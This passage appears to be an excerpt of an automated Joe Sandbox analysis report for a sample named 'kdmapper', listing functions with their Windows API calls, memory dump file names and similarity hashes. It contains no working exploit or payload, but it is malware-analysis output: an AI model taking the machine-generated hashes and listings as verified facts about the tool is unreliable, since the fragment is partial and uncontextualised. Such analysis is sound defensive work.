Part of subcall function 00E097E5: SetLastError.KERNEL32(00000000,?,00E21030,00000200), ref: 00E0985D
Part of subcall function 00E097E5: _abort.LIBCMT ref: 00E09863

Part of subcall function 00E0BB4E: _abort.LIBCMT ref: 00E0BB80
Part of subcall function 00E0BB4E: _free.LIBCMT ref: 00E0BBB4

Part of subcall function 00E0B7BB: GetOEMCP.KERNEL32(00000000,?,?,00E0BA44,?), ref: 00E0B7E6

_free.LIBCMT ref: 00E0BA9F
_free.LIBCMT ref: 00E0BAD5

Strings

p, xrefs: 00E0BAC9

Memory Dump Source

Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true

Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd

Similarity

API ID: _free$ErrorLast_abort
String ID: p
API String ID: 2991157371-2678736219
Opcode ID: acb5fa81ba32e2cbd51e3ebc036edc607a45f734ae4f49322899f3444fb75ae7
Instruction ID: d810b15c0b97a6becb347a48e85a3fc82f9cdba684911cf1f94fa5f9ba047169
Opcode Fuzzy Hash: acb5fa81ba32e2cbd51e3ebc036edc607a45f734ae4f49322899f3444fb75ae7
Instruction Fuzzy Hash: 32319331A04209AFDB10EFA9D541B99B7F5FF40324F255199E904BB2E2EB325D80DB50

Function 00DE9F7A Relevance: 4.6, APIs: 3, Instructions: 111fileCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F5,?,?,?,?,00DED343,00000001,?,?,?,00000000,00DF551D,?,?,?), ref: 00DE9F9E
WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,00000000,00DF551D,?,?,?,?,?,00DF4FC7,?), ref: 00DE9FE5
WriteFile.KERNELBASE(0000001D,?,?,?,00000000,?,00000001,?,?,?,?,00DED343,00000001,?,?), ref: 00DEA011

Memory Dump Source

Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true

Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd

Similarity

API ID: FileWrite$Handle
String ID:
API String ID: 4209713984-0
Opcode ID: 81386bf007db3ec8e31e0d96200f7cf78a72da9a6e59b311357426e638befdc2
Instruction ID: 911c6bdd330fb2860369fceabd6dc5bc0384190d86964decabc47f8f733f6f61
Opcode Fuzzy Hash: 81386bf007db3ec8e31e0d96200f7cf78a72da9a6e59b311357426e638befdc2
Instruction Fuzzy Hash: 5D31E231204386AFDB14EF26D818BAEB7A5FF84715F04491DF981A7290C775AD48CBB2

Function 00DEA2B2 Relevance: 4.6, APIs: 3, Instructions: 55COMMON

Download Yara Rule

APIs

Part of subcall function 00DEC27E: _wcslen.LIBCMT ref: 00DEC284

CreateDirectoryW.KERNELBASE(?,00000000,?,?,?,00DEA175,?,00000001,00000000,?,?), ref: 00DEA2D9
CreateDirectoryW.KERNEL32(?,00000000,?,?,00000800,?,?,?,?,00DEA175,?,00000001,00000000,?,?), ref: 00DEA30C
GetLastError.KERNEL32(?,?,?,?,00DEA175,?,00000001,00000000,?,?), ref: 00DEA329

Memory Dump Source

Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true

Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd

Similarity

API ID: CreateDirectory$ErrorLast_wcslen
String ID:
API String ID: 2260680371-0
Opcode ID: 9caa078a015533cac98843d5053cfb102d74dc0130f2fc7a784ae3121d433945
Instruction ID: 6ce2c615ce5a361a8785fda5b6dcde9c0b4c904e39f5f53c4d5b12e5c8db22f4
Opcode Fuzzy Hash: 9caa078a015533cac98843d5053cfb102d74dc0130f2fc7a784ae3121d433945
Instruction Fuzzy Hash: 8301D831200296AAEF21BBBB4C09BFD3388DF0A780F088415F941E6092D754EA81C6B6

Function 00E0B893 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 132COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 00E0B8B8

Strings

, xrefs: 00E0B8FD

Memory Dump Source

Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true

Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd

Similarity

API ID: Info
String ID:
API String ID: 1807457897-3916222277
Opcode ID: 6a52315c8f0d773339c47f3bfcd155d9420a2144617434857ee3cd07c49991fa
Instruction ID: 93db31d6fa4467451a896eb7164d6a39501c271817cff25674b88ccbddd79e0b
Opcode Fuzzy Hash: 6a52315c8f0d773339c47f3bfcd155d9420a2144617434857ee3cd07c49991fa
Instruction Fuzzy Hash: 2E41197090434C9EDF218E64CC84BF6BBF9EB45308F5454EDE69AA6182D3359A85CF60

Function 00E0AF6C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47COMMONLIBRARYCODE

Download Yara Rule

APIs

LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,2DE85006,00000001,?,?), ref: 00E0AFDD

Strings

LCMapStringEx, xrefs: 00E0AF7D, 00E0AF87

Memory Dump Source

Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true

Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd

Similarity

API ID: String
String ID: LCMapStringEx
API String ID: 2568140703-3893581201
Opcode ID: 23b46d94e7f79f25ab36c2f9333b34114ab1e27c1dedbed95ddc2e8483d3e8b3
Instruction ID: 87522971743af5eeb6fd3769c96c267a44bfc751e72eadf579d81db1ae746dba
Opcode Fuzzy Hash: 23b46d94e7f79f25ab36c2f9333b34114ab1e27c1dedbed95ddc2e8483d3e8b3
Instruction Fuzzy Hash: 8E010C3260420DBBCF12AF91DC05DEE7F62EF48754F458155FE14761A0C6728971EB91

Function 00E0AF0A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 34COMMON

Download Yara Rule

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,00E0A56F), ref: 00E0AF55

Strings

InitializeCriticalSectionEx, xrefs: 00E0AF1B, 00E0AF25

Memory Dump Source

Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true

Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd

Similarity

API ID: CountCriticalInitializeSectionSpin
String ID: InitializeCriticalSectionEx
API String ID: 2593887523-3084827643
Opcode ID: dcccf0a31de7bd0db662de5a3bb4de494a921a07920bfd73334ae35d4d016221
Instruction ID: 2dc739fdbc4e39e191c28e8b2560a6b0a7822c1562a2250b09c4ef1c6ffa68b7
Opcode Fuzzy Hash: dcccf0a31de7bd0db662de5a3bb4de494a921a07920bfd73334ae35d4d016221
Instruction Fuzzy Hash: 14F0B43168530CBFCB116F61CC06CEEBF61EF44B11B058065FD087A2A0DA714A549795

Function 00E0ADAF Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 30memoryCOMMON

Download Yara Rule

APIs

TlsAlloc.KERNEL32 ref: 00E0ADEE

Strings

FlsAlloc, xrefs: 00E0ADC0, 00E0ADCA

Memory Dump Source

Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true

Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd

Similarity

API ID: Alloc
String ID: FlsAlloc
API String ID: 2773662609-671089009
Opcode ID: 302a336844534d57da2695df45fa6457b1de2ff10ee5d83aa05ca8b095d20cd6
Instruction ID: d7cf6b631c06db74d297475edaa056ba9079e33dc55012b4a8d3784e6914d889
Opcode Fuzzy Hash: 302a336844534d57da2695df45fa6457b1de2ff10ee5d83aa05ca8b095d20cd6
Instruction Fuzzy Hash: 4EE0553068131C7BC200AF26CC069EEBBA4CB84B20B0650A9FC05B7280CD704EC482D6

Function 00E0BBF0 Relevance: 3.2, APIs: 2, Instructions: 168COMMON

Download Yara Rule

APIs

Part of subcall function 00E0B7BB: GetOEMCP.KERNEL32(00000000,?,?,00E0BA44,?), ref: 00E0B7E6

IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,00E0BA89,?,00000000), ref: 00E0BC64
GetCPInfo.KERNEL32(00000000,00E0BA89,?,?,?,00E0BA89,?,00000000), ref: 00E0BC77

Memory Dump Source

Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true

Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd

Similarity

API ID: CodeInfoPageValid
String ID:
API String ID: 546120528-0
Opcode ID: c33401fed100f3a697c7850abe4b4601a7ccb073f4ca529cff94418d8760db59
Instruction ID: 327963d4486b41a66f1d32b172f15b6a65594eea3b931747c3a30a50afde3ed6
Opcode Fuzzy Hash: c33401fed100f3a697c7850abe4b4601a7ccb073f4ca529cff94418d8760db59
Instruction Fuzzy Hash: 205146709002459EEB248F71C8816FAFBE5FF41304F18946ED496BB2D1D7349985CB90

Function 00DE9A74 Relevance: 3.1, APIs: 2, Instructions: 116COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(000000FF,?,?,?,-00000870,00000000,00000800,?,00DE9A50,?,?,00000000,?,?,00DE8CBC,?), ref: 00DE9BAB
GetLastError.KERNEL32(?,00000000,00DE8411,-00009570,00000000,000007F3), ref: 00DE9BB6

Memory Dump Source

Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true

Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID:
API String ID: 2976181284-0
Opcode ID: 19fd70a865d0dad8c522710f2fff8dff39667c1c58041c969bee9e60353996e1
Instruction ID: 5ebccf4588636935698c8451942ba463a5c3ad9f9502bddb316e74bb9c198455
Opcode Fuzzy Hash: 19fd70a865d0dad8c522710f2fff8dff39667c1c58041c969bee9e60353996e1
Instruction Fuzzy Hash: 9141B0705063818FDB24EF2AE5E446AF7E6FFD4320F198A2DE89583260D770ED448A71

Function 00DE1E50 Relevance: 3.1, APIs: 2, Instructions: 86COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00DE1E55

Part of subcall function 00DE3BBA: __EH_prolog.LIBCMT ref: 00DE3BBF

_wcslen.LIBCMT ref: 00DE1EFD

Memory Dump Source

Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true

Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd

Similarity

API ID: H_prolog$_wcslen
String ID:
API String ID: 2838827086-0
Opcode ID: bb3bfe64002af2602a81b7f873440a7698b8e1dcc758b5f4ccfd57ac85319914
Instruction ID: 19abde93453b15353299eaeb65fece9b3a85bf6cf5bb916e99b7c9ab5e21e96a
Opcode Fuzzy Hash: bb3bfe64002af2602a81b7f873440a7698b8e1dcc758b5f4ccfd57ac85319914
Instruction Fuzzy Hash: 65313875A04249AACF11EF99C945AEEBBF5EF48300F144069F845A7251C7325E51CB70

Function 00DE9DA2 Relevance: 3.1, APIs: 2, Instructions: 83timeCOMMON

Download Yara Rule

APIs

FlushFileBuffers.KERNEL32(?,?,?,?,?,?,00DE73BC,?,?,?,00000000), ref: 00DE9DBC
SetFileTime.KERNELBASE(?,?,?,?), ref: 00DE9E70

Memory Dump Source

Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true

Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd

Similarity

API ID: File$BuffersFlushTime
String ID:
API String ID: 1392018926-0
Opcode ID: b91b93d1122c9a7b2622643343fe4d108940e370b2582dd02d9394881236eb39
Instruction ID: ac5be0775c8bab2a475124269c3e2d745596ccf85b1e3da9a6b2bfad391d34ae
Opcode Fuzzy Hash: b91b93d1122c9a7b2622643343fe4d108940e370b2582dd02d9394881236eb39
Instruction Fuzzy Hash: F521D03224A295EFC714EF76C8A1AABFBE4AF95704F08891CF4C587141D329E90D9B71

Function 00DE966E Relevance: 3.1, APIs: 2, Instructions: 82fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(?,?,00000001,00000000,00000002,00000000,00000000,?,00000000,?,?,?,00DE9F27,?,?,00DE771A), ref: 00DE96E6
CreateFileW.KERNEL32(?,?,00000001,00000000,00000002,00000000,00000000,?,?,00000800,?,?,00DE9F27,?,?,00DE771A), ref: 00DE9716

Memory Dump Source

Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true

Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: c131f2c4ae5566dafcd45b0dfdb29c8b506af589b8f0c74197fc7a20c0bc148d
Instruction ID: 3bbf658b08e3b857b5d96dc98c1b5e22efd22e5a8393c56401cee8d2d43ede4d
Opcode Fuzzy Hash: c131f2c4ae5566dafcd45b0dfdb29c8b506af589b8f0c74197fc7a20c0bc148d
Instruction Fuzzy Hash: 5321CF71100384AFE330AA66CC89BF7B7ECEB49324F044A1EFAD5C21D1C774A8848671

Function 00DE9E80 Relevance: 3.1, APIs: 2, Instructions: 56COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(000000FF,00000000,00000000,00000001), ref: 00DE9EC7
GetLastError.KERNEL32 ref: 00DE9ED4

Memory Dump Source

Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true

Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID:
API String ID: 2976181284-0
Opcode ID: 0b9c91adc48373915d1dec851930e61ba9f2f4943f5910cb9bd5658fe58e0142
Instruction ID: 7f67a052266c8274f808a46c143c5db06af3ecfab548266353880778402370e3
Opcode Fuzzy Hash: 0b9c91adc48373915d1dec851930e61ba9f2f4943f5910cb9bd5658fe58e0142
Instruction Fuzzy Hash: 55112530602740ABD734E63ACC51BAAF3E8AB44760F544A29F652E26D0E3B0ED49C770

Function 00E08E54 Relevance: 3.0, APIs: 2, Instructions: 44memoryCOMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00E08E75

Part of subcall function 00E08E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00E0CA2C,00000000,?,00E06CBE,?,00000008,?,00E091E0,?,?,?), ref: 00E08E38

HeapReAlloc.KERNEL32(00000000,?,?,?,00000007,00E21098,00DE17CE,?,?,00000007,?,?,?,00DE13D6,?,00000000), ref: 00E08EB1

Memory Dump Source

Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true

Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd

Similarity

API ID: Heap$AllocAllocate_free
String ID:
API String ID: 2447670028-0
Opcode ID: f6085812367f1399301736147fdc1f4595dbe85694ab6d1ba2f2e93ec99f7f3d
Instruction ID: 5c41b1cd256322ddc279dbdb5150f64593a82922160e34673eab906836d0d8aa
Opcode Fuzzy Hash: f6085812367f1399301736147fdc1f4595dbe85694ab6d1ba2f2e93ec99f7f3d
Instruction Fuzzy Hash: 6AF0FC32601102AADB212A25DE04BAF37A88F91770F256115F9D8761D1DF70DDC281A0

Function 00DF109E Relevance: 3.0, APIs: 2, Instructions: 33COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?), ref: 00DF10AB
GetProcessAffinityMask.KERNEL32(00000000), ref: 00DF10B2

Memory Dump Source

Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true

Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd

Similarity

API ID: Process$AffinityCurrentMask
String ID:
API String ID: 1231390398-0
Opcode ID: 81148981edee9ef6634ef50c4cd455d0c4c670e25fe28cb7bd333089744588ef
Instruction ID: f95311b1341b86b5221eee555f13765cbf69c4f58228b4b1040d001199e68663
Opcode Fuzzy Hash: 81148981edee9ef6634ef50c4cd455d0c4c670e25fe28cb7bd333089744588ef
Instruction Fuzzy Hash: 7BE09A3AB00249EBCF0D8BB59C058FB72EEEA48244329C179E603E3101FD30EE454AB0

Function 00DEA4ED Relevance: 3.0, APIs: 2, Instructions: 29COMMON

Download Yara Rule

APIs

SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,00DEA325,?,?,?,00DEA175,?,00000001,00000000,?,?), ref: 00DEA501

Part of subcall function 00DEBB03: _wcslen.LIBCMT ref: 00DEBB27

SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00DEA325,?,?,?,00DEA175,?,00000001,00000000,?,?), ref: 00DEA532

Memory Dump Source

Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true

Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd

Similarity

API ID: AttributesFile$_wcslen
String ID:
API String ID: 2673547680-0
Opcode ID: 02a18be92e2c0f311aa36095a0de5d6a4eb03f7067879f4793af06f684f63aa0
Instruction ID: 93600c41054fa88431c137e0faf32f581a925e4038ac079edf7d24e7da742903
Opcode Fuzzy Hash: 02a18be92e2c0f311aa36095a0de5d6a4eb03f7067879f4793af06f684f63aa0
Instruction Fuzzy Hash: 3CF0E53120024ABBDF026F61DC01FDA3BACAF08385F488451B944E5160DB31DBD8DB70

Function 00DEA1E0 Relevance: 3.0, APIs: 2, Instructions: 27fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNELBASE(000000FF,?,?,00DE977F,?,?,00DE95CF,?,?,?,?,?,00E12641,000000FF), ref: 00DEA1F1

Part of subcall function 00DEBB03: _wcslen.LIBCMT ref: 00DEBB27

DeleteFileW.KERNEL32(?,000000FF,?,00000800,?,?,00DE977F,?,?,00DE95CF,?,?,?,?,?,00E12641), ref: 00DEA21F

Memory Dump Source

Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true

Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd

Similarity

API ID: DeleteFile$_wcslen
String ID:
API String ID: 2643169976-0
Opcode ID: f353061ae4f149d73d3ab21e7ec43e4f795048b1284db8626e8cd6f2d76ef913
Instruction ID: c12ffe9f102fa70f5992f4ae4746c5e6bc93bf006ad487e90589b97edc372ffa
